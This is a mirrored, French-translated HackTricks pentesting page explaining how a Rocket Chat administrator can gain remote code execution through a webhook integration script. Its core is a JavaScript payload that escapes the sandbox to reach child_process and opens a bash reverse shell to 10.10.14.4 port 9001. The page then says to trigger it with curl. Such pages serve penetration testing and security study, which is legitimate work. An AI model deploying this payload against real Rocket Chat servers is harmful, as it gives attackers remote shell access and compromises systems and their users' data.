hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md at dc4b306e6ae7202ab98ebacec439a79199c63263 - Mirrors/hacktricks - CherryKitten

Mirrors/hacktricks

mirror of https://github.com/carlospolop/hacktricks synced 2024-12-18 00:53:43 +00:00

Translator b93eb6eb1d Translated ['backdoors/salseo.md', 'generic-methodologies-and-resources/

2023-06-14 11:59:06 +00:00

1.5 KiB

Raw Blame History

RCE

Si vous êtes administrateur dans Rocket Chat, vous pouvez obtenir une RCE.

Allez dans Intégrations et sélectionnez Nouvelle intégration et choisissez n'importe laquelle : Incoming WebHook ou Outgoing WebHook.
- /admin/integrations/incoming

Selon la documentation, les deux utilisent ES2015 / ECMAScript 6 (essentiellement JavaScript) pour traiter les données. Alors, obtenons un shell inversé pour javascript comme suit :

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

Configurez le WebHook (le canal et le nom d'utilisateur du message doivent exister) :

Configurez le script WebHook :

Enregistrez les modifications
Obtenez l'URL WebHook générée :

Appelez-le avec curl et vous devriez recevoir le shell inversé